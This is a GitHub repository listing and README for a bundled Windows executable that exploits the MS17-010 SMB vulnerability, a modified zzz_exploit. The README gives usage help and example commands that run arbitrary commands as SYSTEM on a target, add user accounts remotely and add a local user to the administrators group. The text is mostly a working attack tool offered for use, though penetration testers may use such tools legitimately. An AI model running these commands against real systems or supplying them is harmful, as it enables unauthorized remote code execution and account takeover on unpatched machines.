https://github.com/irgoncalves/ms17-010
This contains a bundle with an executable to exploit ms17-010 remote or locally. It does not require Python.
- Host: GitHub
- URL: https://github.com/irgoncalves/ms17-010
- Owner: irgoncalves
- Created: 2019-01-10T00:26:00.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2019-01-10T22:18:35.000Z (over 7 years ago)
- Last Synced: 2025-08-18T07:36:47.211Z (10 months ago)
- Topics: executable, ms17-010, python
- Language: Python
- Homepage:
- Size: 9.91 MB
- Stars: 16
- Watchers: 0
- Forks: 6
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# ms17-010
This is a modified version of the zzz_exploit for MS17-010 by [Worawit Wang (GitHub)](https://github.com/worawit/MS17-010/).
It adds a few options, such as username/password specification and an arbitrary command to be executed.
It does not change anything related to the SMB exploitation itself.
This is a bundle with an executable and its dependencies and does NOT require a Python install.
Built with PyInstaller.
# Usage
Unzip the bundle and, from the command line, execute ms17-010-zzz.exe:

```text
ms17-010-zzz.exe -h
usage: ms17-010-zzz.exe [-h] -t TARGET -c COMMAND -P PIPE [-u USER]
                        [-p PASSWORD]

MS17-010 - zzz_explot modified and converted to binary https://github.com/irgoncalves/ms17-010

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target for exploitation
  -c COMMAND, --command COMMAND
                        Command to be executed as a service
  -P PIPE, --pipe PIPE  Pipe to connect (e.g. netlogon)
  -u USER, --user USER  Username to authenticate in case no anomymous
                        connection to a pipe is allowed
  -p PASSWORD, --password PASSWORD
                        Password for the user

Example: ms17-010.exe -t 172.16.0.2 -c 'net user /add testusr teste123'
```
Example to add a user remotely, connecting anonymously to a named pipe:

```text
ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123"
```

Example to add a user remotely, specifying a named pipe and a valid non-administrator user:

```text
ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123" -P netlogon -u svruser -p abc123
```

Example to locally escalate privilege for an existing user (all commands are executed as SYSTEM):

```text
ms17-010-zzz.exe -t 127.0.0.1 -c "net localgroup administrators teste2 /add" -P netlogon -u teste2 -p teste2123
```
# Limitations
Currently supports only the x64 platform (tested running from Windows 10 and Windows Server 2008).